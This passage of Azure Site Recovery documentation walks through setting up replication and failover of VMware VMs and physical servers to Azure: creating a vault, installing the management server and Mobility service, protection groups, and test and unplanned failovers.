| **Protected machines** |**AZURE**<br/><br/>Machines you want to protect should conform with [Azure prerequisites](site-recovery-best-practices.md#azure-virtual-machine-requirements) for creating Azure VMs.<br/><br/>If you want to connect to the Azure VMs after failover then you'll need to enable Remote Desktop connections on the local firewall.<br/><br/>Individual disk capacity on protected machines shouldn't be more than 1023 GB. A VM can have up to 64 disks (thus up to 64 TB). If you have disks larger than 1 TB consider using database replication such as SQL Server Always On or Oracle Data Guard.<br/><br/>Minimum 2 GB of available space on the installation drive for component installation.<br/><br/>Shared disk guest clusters aren't supported. If you have a clustered deployment consider using database replication such as SQL Server Always On or Oracle Data Guard.<br/><br/>Unified Extensible Firmware Interface (UEFI)/Extensible Firmware Interface (EFI) boot isn't supported.<br/><br/>Machine names should contain between 1 and 63 characters (letters, numbers, and hyphens). The name must start with a letter or number and end with a letter or number. After a machine is protected you can modify the Azure name.<br/><br/>**VMware VMs**<br/><br/>You'll need to install VMware vSphere PowerCLI 6.0.
on the management server (configuration server).<br/><br/>VMware VMs you want to protect should have VMware tools installed and running.<br/><br/>If the source VM has NIC teaming it’s converted to a single NIC after failover to Azure.<br/><br/>If protected VMs have an iSCSI disk then Site Recovery converts the protected VM iSCSI disk into a VHD file when the VM fails over to Azure. If iSCSI target can be reached by the Azure VM then it will connect to iSCSI target and essentially see two disks – the VHD disk on the Azure VM and the source iSCSI disk. In this case you’ll need to disconnect the iSCSI target that appears on the failed over Azure VM.<br/><br/>[Learn more](#vmware-permissions-for-vcenter-access) about the VMware user permissions that are needed by Site Recovery.<br/><br/> **WINDOWS SERVER MACHINES (on VMware VM or physical server)**<br/><br/>The server should be running a supported 64-bit operating system: Windows Server 2012 R2, Windows Server 2012, or Windows Server 2008 R2 with at least SP1.<br/><br/>The operating system should be installed on C:\ drive and the OS disk should be a Windows basic disk (OS shouldn’t be installed on a Windows dynamic disk.)<br/><br/>For Windows Server 2008 R2 machines you will need to have .NET Framework 3.5.1 installed.<br/><br/>You'll need to provide an administrator account (must be a local administrator on the Windows machine) for the push installation the Mobility Service on Windows servers. If the provided account is a non-domain account you'll need to disable Remote User Access control on the local machine. [Learn more](#install-the-mobility-service-with-push-installation).<br/><br/>Site Recovery supports VMs with RDM disk. During failback Site Recovery will reuse the RDM disk if the original source VM and RDM disk is available. 
If they aren't available, during failback Site Recovery will create a new VMDK file for each disk.<br/><br/>**LINUX MACHINES**<br/><br/>You'll need a supported 64-bit operating system: Red Hat Enterprise Linux 6.7; CentOS 6.5, 6.6, 6.7; Oracle Enterprise Linux 6.4, 6.5 running either the Red Hat compatible kernel or Unbreakable Enterprise Kernel Release 3 (UEK3); SUSE Linux Enterprise Server 11 SP3.<br/><br/>/etc/hosts files on protected machines should contain entries that map the local host name to IP addresses associated with all network adapters.<br/><br/>If you want to connect to an Azure virtual machine running Linux after failover using a Secure Shell client (ssh), ensure that the Secure Shell service on the protected machine is set to start automatically on system boot, and that firewall rules allow an ssh connection to it.<br/><br/>Protection can only be enabled for Linux machines with the following storage: File system (EXT3, EXT4, ReiserFS, XFS); Multipath software (Device Mapper multipath); Volume manager (LVM2). Physical servers with HP CCISS controller storage are not supported. The ReiserFS filesystem is supported only on SUSE Linux Enterprise Server 11 SP3.<br/><br/>Site Recovery supports VMs with RDM disk. During failback for Linux, Site Recovery doesn't reuse the RDM disk. Instead it creates a new VMDK file for each corresponding RDM disk. |

For Linux VMs only, ensure that you set the disk.enableUUID=true setting in the Configuration Parameters of the VM in VMware. If this row does not exist, add it. This is required to provide a consistent UUID to the VMDK so that it mounts correctly. Also note that without this setting, failback will cause a full download even if the VM is available on-premises. Adding this setting will ensure that only delta changes are transferred back during failback.

## Step 1: Create a vault
1. Sign in to the [Management Portal](https://manage.windowsazure.com/).
2. Expand **Data Services** > **Recovery Services** and click **Site Recovery Vault**.
3. Click **Create New** > **Quick Create**.
4. In **Name**, enter a friendly name to identify the vault.
5. In **Region**, select the geographic region for the vault. To check supported regions, see Geographic Availability in [Azure Site Recovery Pricing Details](https://azure.microsoft.com/pricing/details/site-recovery/).
6. Click **Create vault**.

    ![New vault](./media/site-recovery-vmware-to-azure-classic/quick-start-create-vault.png)

Check the status bar to confirm that the vault was successfully created. The vault will be listed as **Active** on the main **Recovery Services** page.

## Step 2: Set up an Azure network
Set up an Azure network so that Azure VMs will be connected to a network after failover, and so that failback to the on-premises site can work as expected.

1. In the Azure portal > **Create virtual network**, specify the network name, IP address range, and subnet name.
2. You would need to add VPN/ExpressRoute to the network if you need to do failback. VPN/ExpressRoute can be added to the network even after failover. [Read more](../virtual-network/virtual-networks-overview.md) about Azure networks.

> [!NOTE]
> [Migration of networks](../resource-group-move-resources.md) across resource groups within the same subscription or across subscriptions is not supported for networks used for deploying Site Recovery.
>
>

## Step 3: Install the VMware components
If you want to replicate VMware virtual machines, install the following VMware components on the management server:

1. [Download](https://developercenter.vmware.com/tool/vsphere_powercli/6.0) and install VMware vSphere PowerCLI 6.0.
2. Restart the server.

## Step 4: Download a vault registration key
1. From the management server open the Site Recovery console in Azure. In the **Recovery Services** page click the vault to open the Quick Start page. Quick Start can also be opened at any time using the icon.
![Quick Start Icon](./media/site-recovery-vmware-to-azure-classic/quick-start-icon.png) 2. On the **Quick Start** page click **Prepare Target Resources** > **Download a registration key**. The registration file is generated automatically. It's valid for 5 days after it's generated. ## Step 5: Install the management server > [!TIP] > Make sure these URLs are accessible from the management server: > > * *.hypervrecoverymanager.windowsazure.com > * *.accesscontrol.windows.net > * *.backup.windowsazure.com > * *.blob.core.windows.net > * *.store.core.windows.net > * https://dev.mysql.com/get/archives/mysql-5.5/mysql-5.5.37-win32.msi > * https://www.msftncsi.com/ncsi.txt > > [!VIDEO https://channel9.msdn.com/Blogs/Windows-Azure/Enhanced-VMware-to-Azure-Setup-Registration/player] 1. On the **Quick Start** page download the unified installation file to the server. 2. Run the installation file to start setup in the Site Recovery Unified Setup wizard. 3. In **Before you begin** select **Install the configuration server and process server**. ![Before you start](./media/site-recovery-vmware-to-azure-classic/combined-wiz1.png) 4. In **Third-Party Software License** click **I Accept** to download and install MySQL. ![Third=party software](./media/site-recovery-vmware-to-azure-classic/combined-wiz105.PNG) 5. In **Registration** browse and select the registration key you downloaded from the vault. ![Registration](./media/site-recovery-vmware-to-azure-classic/combined-wiz3.png) 6. In **Internet Settings** specify how the Provider running on the configuration server will connect to Azure Site Recovery over the internet. * If you want to connect with the proxy that's currently set up on the machine select **Connect with existing proxy settings**. * If you want the Provider to connect directly select **Connect directly without a proxy**. 
* If the existing proxy requires authentication, or you want to use a custom proxy for the Provider connection, select **Connect with custom proxy settings**. * If you use a custom proxy you'll need to specify the address, port, and credentials * If you're using a proxy you should have already allowed the following URLs: * *.hypervrecoverymanager.windowsazure.com; * *.accesscontrol.windows.net; * *.backup.windowsazure.com; * *.blob.core.windows.net; * *.store.core.windows.net ![Firewall](./media/site-recovery-vmware-to-azure-classic/combined-wiz4.png) 1. In **Prerequisites Check** setup runs a check to make sure that installation can run. ![Prerequisites](./media/site-recovery-vmware-to-azure-classic/combined-wiz5.png) If a warning appears about the **Global time sync check** verify that the time on the system clock (**Date and Time** settings) is the same as the time zone. ![TimeSyncIssue](./media/site-recovery-vmware-to-azure-classic/time-sync-issue.png) 1. In **MySQL Configuration** create credentials for logging onto the MySQL server instance that will be installed. ![MySQL](./media/site-recovery-vmware-to-azure-classic/combined-wiz6.png) 2. In **Environment Details** select whether you're going to replicate VMware VMs. If you are, then setup checks that PowerCLI 6.0 is installed. ![MySQL](./media/site-recovery-vmware-to-azure-classic/combined-wiz7.png) 3. In **Install Location** select where you want to install the binaries and store the cache. You can select a drive that has at least 5 GB of storage available but we recommend a cache drive with at least 600 GB of free space. ![Install location](./media/site-recovery-vmware-to-azure-classic/combined-wiz8.png) 4. In **Network Selection** specify the listener (network adapter and SSL port) on which the configuration server will send and receive replication data. You can modify the default port (9443). In addition to this port, port 443 will be used by a web server which orchestrates replication operations. 
443 shouldn't be used for receiving replication traffic.

    ![Network selection](./media/site-recovery-vmware-to-azure-classic/combined-wiz9.png)
1. In **Summary** review the information and click **Install**. When installation finishes a passphrase is generated. You'll need it when you enable replication, so copy it and keep it in a secure location.

    ![Summary](./media/site-recovery-vmware-to-azure-classic/combined-wiz10.png)

> [!WARNING]
> The Microsoft Azure Recovery Services Agent's proxy needs to be set up.
> Once the installation is complete, launch the application named "Microsoft Azure Recovery Services Shell" from the Windows Start menu. In the command window that opens, run the following set of commands to set up the proxy server settings.
>
>     $pwd = ConvertTo-SecureString -String ProxyUserPassword
>     Set-OBMachineSetting -ProxyServer http://myproxyserver.domain.com -ProxyPort PortNumb -ProxyUserName domain\username -ProxyPassword $pwd
>     net stop obengine
>     net start obengine
>
>

### Run setup from the command line
You can also run the unified wizard from the command line, as follows:

    UnifiedSetup.exe [/ServerMode <CS/PS>] [/InstallDrive <DriveLetter>] [/MySQLCredsFilePath <MySQL credentials file path>] [/VaultCredsFilePath <Vault credentials file path>] [/EnvType <VMWare/NonVMWare>] [/PSIP <IP address to be used for data transfer>] [/CSIP <IP address of CS to be registered with>] [/PassphraseFilePath <Passphrase file path>]

Where:

* /ServerMode: Mandatory. Specifies whether the install should install the configuration and process servers, or the process server only (used to install additional process servers). Input values: CS, PS.
* /InstallDrive: Mandatory. Specifies the folder where the components are installed.
* /MySQLCredFilePath: Mandatory. Specifies the path to a file where the MySQL server credentials are stored.
  Get the template to create the file.
* /VaultCredsFilePath: Mandatory. Location of the vault credentials file.
* /EnvType: Mandatory. Type of installation. Values: VMware, NonVMware.
* /PSIP and /CSIP: Mandatory. IP address of the process server and configuration server.
* /PassphraseFilePath: Mandatory. Location of the passphrase file.
* /ByPassProxy: Optional. Specifies that the management server connects to Azure without a proxy.
* /ProxySettingsFilePath: Optional. Specifies settings for a custom proxy (either a default proxy on the server that requires authentication, or a custom proxy).

## Step 6: Set up credentials for the vCenter server

> [!VIDEO https://channel9.msdn.com/Blogs/Windows-Azure/Enhanced-VMware-to-Azure-Discovery/player]

The process server can automatically discover VMware VMs that are managed by a vCenter server. For automatic discovery Site Recovery needs an account and credentials that can access the vCenter server. This isn't relevant if you're replicating physical servers only. Do this as follows:

1. On the vCenter server create a role (**Azure_Site_Recovery**) at the vCenter level with the [required permissions](#vmware-permissions-for-vcenter-access).
2. Assign the **Azure_Site_Recovery** role to a vCenter user.

   > [!NOTE]
   > A vCenter user account that has the read-only role can run failover without shutting down protected source machines. If you want to shut down those machines you'll need the Azure_Site_Recovery role. Note that if you're only migrating VMs from VMware to Azure and don't need to fail back, then the read-only role is sufficient.

3. To add the account open **cspsconfigtool**. It's available as a shortcut on the desktop and located in the [INSTALL LOCATION]\home\svsystems\bin folder.
4. In the **Manage Accounts** tab, click **Add Account**.

   ![Add account](./media/site-recovery-vmware-to-azure-classic/credentials1.png)
5. In **Account Details** add credentials that can be used to access the vCenter server.
   Note that it could take more than 15 minutes for the account name to appear in the portal. To update immediately, click **Refresh** on the **Configuration Servers** tab.

   ![Details](./media/site-recovery-vmware-to-azure-classic/credentials2.png)

## Step 7: Add vCenter servers and ESXi hosts

If you're replicating VMware VMs you need to add a vCenter server (or ESXi host).

1. On the **Servers** > **Configuration Servers** tab, select the configuration server > **Add vCenter server**.

   ![vCenter](./media/site-recovery-vmware-to-azure-classic/add-vcenter1.png)
2. Add the vCenter server or ESXi host details, the name of the account you specified to access the vCenter server in the previous step, and the process server that will be used to discover VMware VMs that are managed by the vCenter server. Note that the vCenter server or ESXi host should be located in the same network as the server on which the process server is installed.

   > [!NOTE]
   > If you're adding the vCenter server or ESXi host with an account that doesn't have administrator privileges on the vCenter or host server, then make sure the vCenter or ESXi accounts have these privileges enabled: Datacenter, Datastore, Folder, Host, Network, Resource, Virtual machine, vSphere Distributed Switch. In addition the vCenter server needs the Storage views privilege.

   ![vCenter](./media/site-recovery-vmware-to-azure-classic/add-vcenter2.png)
3. After discovery is complete the vCenter server will be listed in the **Configuration Servers** tab.

   ![vCenter](./media/site-recovery-vmware-to-azure-classic/add-vcenter3.png)

## Step 8: Create a protection group

> [!VIDEO https://channel9.msdn.com/Blogs/Windows-Azure/Enhanced-VMware-to-Azure-Protection/player]

Protection groups are logical groupings of virtual machines or physical servers that you want to protect using the same protection settings.
You apply protection settings to a protection group, and those settings are applied to all virtual machines/physical machines that you add to the group.

1. Open **Protected Items** > **Protection Group** and click to add a protection group.

   ![Create protection group](./media/site-recovery-vmware-to-azure-classic/protection-groups1.png)
2. On the **Specify Protection Group Settings** page specify a name for the group, and in **From** select the configuration server on which you want to create the group. **Target** is Azure.

   ![Protection group settings](./media/site-recovery-vmware-to-azure-classic/protection-groups2.png)
3. On the **Specify Replication Settings** page configure the replication settings that will be used for all the machines in the group.

   ![Protection group replication](./media/site-recovery-vmware-to-azure-classic/protection-groups3.png)

   * **Multi VM consistency**: If you turn this on it creates shared application-consistent recovery points across the machines in the protection group. This setting is most relevant when all of the machines in the protection group are running the same workload. All machines will be recovered to the same data point. This is available whether you're replicating VMware VMs, or Windows/Linux physical servers.
   * **RPO threshold**: Sets the RPO. Alerts will be generated when the continuous data protection replication exceeds the configured RPO threshold value.
   * **Recovery point retention**: Specifies the retention window. Protected machines can be recovered to any point within this window.
   * **Application-consistent snapshot frequency**: Specifies how frequently recovery points containing application-consistent snapshots will be created.

When you click on the checkmark a protection group will be created with the name you specified. In addition a second protection group is created with the name <protection-group-name>-Failback. This protection group is used if you fail back to the on-premises site after failover to Azure.
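As a rough, hypothetical illustration of how the retention and snapshot-frequency settings relate (example numbers only, not Site Recovery defaults): with a 24-hour retention window and an application-consistent snapshot every 60 minutes, roughly 24 application-consistent points fall inside the window.

```shell
# Hypothetical example values — not Site Recovery defaults.
retention_hours=24        # Recovery point retention window
snapshot_minutes=60       # Application-consistent snapshot frequency
app_consistent_points=$(( retention_hours * 60 / snapshot_minutes ))
echo "About ${app_consistent_points} application-consistent recovery points in the retention window"
```

Shorter snapshot intervals give more granular application-consistent points, at the cost of extra load on the protected machines.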
You can monitor the protection groups as they're created on the **Protected Items** page.

## Step 9: Install the Mobility service

The first step in enabling protection for virtual machines and physical servers is to install the Mobility service. You can do this in three ways:

* Automatically push and install the service on each machine from the process server. Note that when you add machines to a protection group and they're already running an appropriate version of the Mobility service, push installation won't occur.
* Automatically install the service using your enterprise push method, such as WSUS or System Center Configuration Manager. Make sure you've set up the management server before you do this.
* Install manually on each machine you want to protect. Make sure you've set up the management server before you do this.

### Install the Mobility service with push installation

When you add machines to a protection group the Mobility service is automatically pushed and installed on each machine by the process server.

#### Prepare for automatic push on Windows machines

Here's how to prepare Windows machines so that the Mobility service can be automatically installed by the process server.

1. Create an account that can be used by the process server to access the machine. The account should have administrator privileges (local or domain). Note that these credentials are only used for push installation of the Mobility service.

   > [!NOTE]
   > If you're not using a domain account you'll need to disable Remote User Access control on the local machine. To do this, in the registry under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, add the DWORD entry LocalAccountTokenFilterPolicy with a value of 1. To add the registry entry from a command prompt or PowerShell, enter **`REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1`**.

2.
On the Windows Firewall of the machine you want to protect, select **Allow an app or feature through Firewall** and enable **File and Printer Sharing** and **Windows Management Instrumentation**. For machines that belong to a domain you can configure the firewall policy with a GPO.

   ![Firewall settings](./media/site-recovery-vmware-to-azure-classic/mobility1.png)
3. Add the account you created:
   * Open **cspsconfigtool**. It's available as a shortcut on the desktop and located in the [INSTALL LOCATION]\home\svsystems\bin folder.
   * In the **Manage Accounts** tab, click **Add Account**.
   * Add the account you created. After adding the account you'll need to provide the credentials when you add a machine to a protection group.

#### Prepare for automatic push on Linux servers

1. Make sure that the Linux machine you want to protect is supported as described in [On-premises prerequisites](#on-premises-prerequisites). Ensure there’s network connectivity between the machine you want to protect and the management server that runs the process server.
2. Create an account that can be used by the process server to access the machine. The account should be a root user on the source Linux server. Note that these credentials are only used for push installation of the Mobility service.
   * Open **cspsconfigtool**. It's available as a shortcut on the desktop and located in the [INSTALL LOCATION]\home\svsystems\bin folder.
   * In the **Manage Accounts** tab, click **Add Account**.
   * Add the account you created. After adding the account you'll need to provide the credentials when you add a machine to a protection group.
3. Check that the /etc/hosts file on the source Linux server contains entries that map the local hostname to IP addresses associated with all network adapters.
4. Install the latest openssh, openssh-server, and openssl packages on the machine you want to protect.
5. Ensure SSH is enabled and running on port 22.
6.
Enable the SFTP subsystem and password authentication in the sshd_config file as follows:
   * Log in as root.
   * In the /etc/ssh/sshd_config file, find the line that begins with PasswordAuthentication.
   * Uncomment the line and change the value from **no** to **yes**.
   * Find the line that begins with **Subsystem** and uncomment the line.

   ![Linux](./media/site-recovery-vmware-to-azure-classic/mobility2.png)

### Install the Mobility service manually

The installers are available in C:\Program Files (x86)\Microsoft Azure Site Recovery\home\svsystems\pushinstallsvc\repository.

| Source operating system | Mobility service installation file |
| --- | --- |
| Windows Server (64 bit only) | Microsoft-ASR_UA_9.*.0.0_Windows_*release.exe |
| CentOS 6.4, 6.5, 6.6 (64 bit only) | Microsoft-ASR_UA_9.*.0.0_RHEL6-64_*release.tar.gz |
| SUSE Linux Enterprise Server 11 SP3 (64 bit only) | Microsoft-ASR_UA_9.*.0.0_SLES11-SP3-64_*release.tar.gz |
| Oracle Enterprise Linux 6.4, 6.5 (64 bit only) | Microsoft-ASR_UA_9.*.0.0_OL6-64_*release.tar.gz |

#### Install manually on a Windows server

1. Download and run the relevant installer.
2. In **Before you begin** select **Mobility service**.

   ![Mobility service](./media/site-recovery-vmware-to-azure-classic/mobility3.png)
3. In **Configuration Server Details** specify the IP address of the management server and the passphrase that was generated when you installed the management server components. You can retrieve the passphrase by running **<SiteRecoveryInstallationFolder>\home\svsystems\bin\genpassphrase.exe -n** on the management server.

   ![Mobility service](./media/site-recovery-vmware-to-azure-classic/mobility6.png)
4. In **Install Location** leave the default location and click **Next** to begin installation.
5. In **Installation Progress** monitor installation and restart the machine if prompted.
You can also install from the command line:

    UnifiedAgent.exe [/Role <Agent/MasterTarget>] [/InstallLocation <Installation Directory>] [/CSIP <IP address of CS to be registered with>] [/PassphraseFilePath <Passphrase file path>] [/LogFilePath <Log File Path>]

Where:

* /Role: Mandatory. Specifies whether the Mobility service (Agent) or the master target (MasterTarget) should be installed.
* /InstallLocation: Mandatory. Specifies where to install the service.
* /CSIP: Mandatory. Specifies the IP address of the configuration server to register with.
* /PassphraseFilePath: Mandatory. Specifies the path to the configuration server passphrase file.
* /LogFilePath: Mandatory. Specifies the location of the setup log files.

#### Uninstall the Mobility service manually

The Mobility service can be uninstalled using Add or Remove Programs in Control Panel, or from the command line:

    MsiExec.exe /qn /x {275197FC-14FD-4560-A5EB-38217F80CBD1}

#### Modify the IP address of the management server

After running the wizard you can modify the IP address of the management server as follows:

1. Run hostconfig.exe (located on the desktop).
2. On the **Global** tab you can change the IP address of the management server.

   > [!NOTE]
   > You should only change the IP address of the management server. The port number for management server communications must be 443, and Use HTTPS should be left enabled. The passphrase shouldn't be modified.

   ![Management server IP address](./media/site-recovery-vmware-to-azure-classic/host-config.png)

#### Install manually on a Linux server

1. Copy the appropriate tar archive, based on the table above, to the Linux machine you want to protect.
2. Open a shell program and extract the zipped tar archive to a local path by running: `tar -xvzf Microsoft-ASR_UA_9.*`
3. Create a passphrase.txt file in the local directory to which you extracted the contents of the tar archive.
   To do this, copy the passphrase from C:\ProgramData\Microsoft Azure Site Recovery\private\connection.passphrase on the management server, and save it in passphrase.txt by running `echo <passphrase> >passphrase.txt` in the shell.
4. Install the Mobility service by entering `sudo ./install -t both -a host -R Agent -d /usr/local/ASR -i <IP address> -p <port> -s y -c https -P passphrase.txt`.
5. Specify the internal IP address of the management server and make sure port 443 is selected.

**You can also install from the command line**:

1. Copy the passphrase from C:\Program Files (x86)\InMage Systems\private\connection on the management server, and save it as passphrase.txt. Then run these commands. In our example the management server IP address is 104.40.75.37 and the HTTPS port is 443:

   To install on a production server:

       ./install -t both -a host -R Agent -d /usr/local/ASR -i 104.40.75.37 -p 443 -s y -c https -P passphrase.txt

   To install on the master target server:

       ./install -t both -a host -R MasterTarget -d /usr/local/ASR -i 104.40.75.37 -p 443 -s y -c https -P passphrase.txt

## Step 10: Enable protection for a machine

To enable protection you add virtual machines and physical servers to a protection group. Before you start, note the following if you're protecting VMware virtual machines:

* VMware VMs are discovered every 15 minutes, and it could take more than 15 minutes for them to appear in the Site Recovery portal after discovery.
* Environment changes on the virtual machine (such as VMware tools installation) might also take more than 15 minutes to be updated in Site Recovery.
* You can check the last discovered time for VMware VMs in the **Last Contact At** field for the vCenter server/ESXi host on the **Configuration Servers** tab.
* If you have already created a protection group and add a vCenter server or ESXi host after that, it might take more than 15 minutes for the Azure Site Recovery portal to refresh and for virtual machines to be listed in the **Add machines to a protection group** dialog.
* If you would like to proceed immediately with adding machines to a protection group without waiting for the scheduled discovery, highlight the configuration server (don’t click it) and click the **Refresh** button.

In addition note that:

* We recommend that you architect your protection groups so that they mirror your workloads. For example, add machines running a specific application to the same group.
* When you add machines to a protection group, the process server automatically pushes and installs the Mobility service if it isn't already installed. Note that you'll need to have the push mechanism prepared as described in the previous step.

Add machines to a protection group:

1. Click **Protected Items** > **Protection Group** > **Machines** > **Add Machines**.
2. In **Select Virtual Machines**, if you're protecting VMware virtual machines, select a vCenter server that's managing your virtual machines (or the ESXi host on which they're running), and then select the machines.

   ![Enable protection](./media/site-recovery-vmware-to-azure-classic/enable-protection2.png)
3. In **Select Virtual Machines**, if you're protecting physical servers, in the **Add Physical Machines** wizard provide the IP address and friendly name. Then select the operating system family.

   ![Enable protection](./media/site-recovery-vmware-to-azure-classic/enable-protection1.png)
4. In **Specify Target Resources** select the storage account you're using for replication, and select whether the settings should be used for all workloads. Note that premium storage accounts aren't currently supported.
   > [!NOTE]
   > 1. We do not support the move of storage accounts created using the [new Azure portal](../storage/storage-create-storage-account.md) across resource groups.
   > 2. [Migration of storage accounts](../resource-group-move-resources.md) across resource groups within the same subscription, or across subscriptions, is not supported for storage accounts used for deploying Site Recovery.

   ![Enable protection](./media/site-recovery-vmware-to-azure-classic/enable-protection3.png)
5. In **Specify Accounts** select the account you [configured](#install-the-mobility-service-with-push-installation) to use for automatic installation of the Mobility service.

   ![Enable protection](./media/site-recovery-vmware-to-azure-classic/enable-protection4.png)
6. Click the check mark to finish adding machines to the protection group and to start initial replication for each machine.

   > [!NOTE]
   > If push installation has been prepared, the Mobility service is automatically installed on machines that don't have it as they're added to the protection group. After the service is installed, a protection job starts and fails. After the failure you'll need to manually restart each machine on which the Mobility service was installed. After the restart the protection job begins again and initial replication occurs.

   You can monitor status on the **Jobs** page.

   ![Enable protection](./media/site-recovery-vmware-to-azure-classic/enable-protection5.png)

   In addition, protection status can be monitored in **Protected Items** > <protection group name> > **Virtual Machines**. After initial replication completes and data is synchronized, machine status changes to **Protected**.

   ![Enable protection](./media/site-recovery-vmware-to-azure-classic/enable-protection6.png)

## Step 11: Set protected machine properties

1. After a machine has a **Protected** status you can configure its failover properties. In the protection group details select the machine and open the **Configure** tab.
2.
Site Recovery automatically suggests properties for the Azure VM and detects the on-premises network settings.

   ![Set virtual machine properties](./media/site-recovery-vmware-to-azure-classic/vm-properties1.png)
3. You can modify these settings:
   * **Azure VM name**: This is the name that will be given to the machine in Azure after failover. The name must comply with Azure requirements.
   * **Azure VM size**: The number of network adapters is dictated by the size you specify for the target virtual machine. [Read more](../virtual-machines/virtual-machines-linux-sizes.md#size-tables) about sizes and adapters. Note that:
     * When you modify the size for a virtual machine and save the settings, the number of network adapters will change the next time you open the **Configure** tab. The number of network adapters on the target virtual machine is the minimum of the number of network adapters on the source virtual machine and the maximum number of network adapters supported by the chosen virtual machine size.
     * If the number of network adapters on the source machine is less than or equal to the number of adapters allowed for the target machine size, then the target will have the same number of adapters as the source.
     * If the number of adapters for the source virtual machine exceeds the number allowed for the target size, then the target size maximum will be used.
     * For example, if a source machine has two network adapters and the target machine size supports four, the target machine will have two adapters. If the source machine has two adapters but the target size supports only one, then the target machine will have only one adapter.
     * If the virtual machine has multiple network adapters, all adapters should be connected to the same Azure network.
   * **Azure network**: You must specify an Azure network that Azure VMs will be connected to after failover. If you don't specify one then the Azure VMs won't be connected to any network.
     In addition, you'll need to specify an Azure network if you want to fail back from Azure to the on-premises site. Failback requires a VPN connection between an Azure network and an on-premises network.
   * **Azure IP address/subnet**: For each network adapter you select the subnet to which the Azure VM should connect. Note that:
     * If the network adapter of the source machine is configured to use a static IP address, then you can specify a static IP address for the Azure VM. If you don't provide a static IP address then any available IP address will be allocated. If the target IP address is specified but is already in use by another VM in Azure, then failover will fail.
     * If the network adapter of the source machine is configured to use DHCP, then you'll have DHCP as the setting for Azure.

## Step 12: Create a recovery plan and run a failover

> [!VIDEO https://channel9.msdn.com/Blogs/Windows-Azure/Enhanced-VMware-to-Azure-Failover/player]

You can run a failover for a single machine, or fail over multiple virtual machines that perform the same task or run the same workload. To fail over multiple machines at the same time you add them to a recovery plan.

### Create a recovery plan

1. On the **Recovery Plans** page click **Add Recovery Plan** and add a recovery plan. Specify details for the plan and select **Azure** as the target.

   ![Configure recovery plan](./media/site-recovery-vmware-to-azure-classic/recovery-plan1.png)
2. In **Select Virtual Machine** select a protection group and then select machines in the group to add to the recovery plan.

   ![Add virtual machines](./media/site-recovery-vmware-to-azure-classic/recovery-plan2.png)

You can customize the plan to create groups and sequence the order in which machines in the recovery plan are failed over. You can also add scripts and prompts for manual actions. Scripts can be created manually or by using [Azure Automation Runbooks](site-recovery-runbook-automation.md).
[Learn more](site-recovery-create-recovery-plans.md) about customizing recovery plans.

## Run a failover

Before you run a failover, note the following:

* Make sure that the management server is running and available; otherwise failover will fail.
* If you run an unplanned failover, note that:
  * If possible you should shut down primary machines before you run an unplanned failover. This ensures that you don't have both the source and replica machines running at the same time. If you're replicating VMware VMs, then when you run an unplanned failover you can specify that Site Recovery should make a best effort to shut down the source machines. Depending on the state of the primary site this might or might not work. If you're replicating physical servers, Site Recovery doesn't offer this option.
  * When you perform an unplanned failover it stops data replication from primary machines, so no data delta will be transferred after an unplanned failover begins.
* If you want to connect to the replica virtual machine in Azure after failover, enable Remote Desktop Connection on the source machine before you run the failover, and allow RDP connection through the firewall. You'll also need to allow RDP on the public endpoint of the Azure virtual machine after failover. Follow these [best practices](http://social.technet.microsoft.com/wiki/contents/articles/31666.troubleshooting-remote-desktop-connection-after-failover-using-asr.aspx) to ensure that RDP works after a failover.

> [!NOTE]
> To get the best performance when you fail over to Azure, make sure you have installed the Azure agent on the protected machine. This helps the machine boot faster and helps with diagnosing issues.
> The Linux agent can be found [here](https://github.com/Azure/WALinuxAgent) and the Windows agent can be found [here](http://go.microsoft.com/fwlink/?LinkID=394789).

### Run a test failover

Run a test failover to simulate your failover and recovery processes in an isolated network that doesn't affect your production environment; regular replication continues as normal. Test failover is initiated on the source, and you can run it in a couple of ways:

* **Don't specify an Azure network**: If you run a test failover without a network, the test will simply check that virtual machines start and appear correctly in Azure. Virtual machines won’t be connected to an Azure network after failover.
* **Specify an Azure network**: This type of failover checks that the entire replication environment comes up as expected and that Azure virtual machines are connected to the specified network.

1. On the **Recovery Plans** page select the plan and click **Test Failover**.

   ![Add virtual machines](./media/site-recovery-vmware-to-azure-classic/test-failover1.png)
2. In **Confirm Test Failover** select **None** to indicate you don't want to use an Azure network for the test failover, or select the network to which the test VMs will be connected after failover. Click the check mark to start the failover.

   ![Add virtual machines](./media/site-recovery-vmware-to-azure-classic/test-failover2.png)
3. Monitor failover progress on the **Jobs** tab.

   ![Add virtual machines](./media/site-recovery-vmware-to-azure-classic/test-failover3.png)
4. After the failover completes you should also be able to see the replica Azure machine appear in the Azure portal > **Virtual Machines**. If you want to initiate an RDP connection to the Azure VM you’ll need to open port 3389 on the VM endpoint.
5. After you’ve finished, when failover reaches the **Complete testing** phase, click **Complete Test** to finish. In **Notes** record and save any observations associated with the test failover.
6.
Click **The test failover is complete** to automatically clean up the test environment. After this is done the test failover will show a **Complete** status. Any elements or VMs created automatically during the test failover are deleted. Note that if a test failover continues longer than two weeks it’s completed by force.

### Run an unplanned failover

Unplanned failover is initiated from Azure and can be performed even if the primary site isn't available.

1. On the **Recovery Plans** page select the plan and click **Failover** > **Unplanned Failover**.

   ![Add virtual machines](./media/site-recovery-vmware-to-azure-classic/unplanned-failover1.png)
2. If you're replicating VMware virtual machines you can select to try to shut down the on-premises VMs. This is best-effort, and failover will continue whether the shutdown succeeds or not. If it doesn't succeed, error details will appear on the **Jobs** tab > **Unplanned Failover Jobs**.

   ![Add virtual machines](./media/site-recovery-vmware-to-azure-classic/unplanned-failover2.png)

   > [!NOTE]
   > This option isn't available if you're replicating physical servers. You'll need to try to shut those down manually if possible.

3. In **Confirm Failover** verify the failover direction (to Azure) and select the recovery point you want to use for the failover. If you enabled multi-VM consistency when you configured replication properties, you can recover to the latest application-consistent or crash-consistent recovery point. You can also select **Custom recovery point** to recover to an earlier point in time. Click the check mark to start the failover.

   ![Add virtual machines](./media/site-recovery-vmware-to-azure-classic/unplanned-failover3.png)
4. Wait for the unplanned failover job to complete. You can monitor failover progress on the **Jobs** tab. Note that even if errors occur during unplanned failover the recovery plan runs until it's complete. You should also be able to see the replica Azure machine appear in **Virtual Machines** in the Azure portal.
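Once you've opened port 3389 on the failed-over VM's endpoint, you can sanity-check that the RDP endpoint accepts TCP connections before attempting a full Remote Desktop session. This is a hypothetical helper, not part of Site Recovery tooling, and the endpoint name in the example is a placeholder:

```shell
# Hypothetical helper: checks whether a TCP endpoint (e.g. the RDP public
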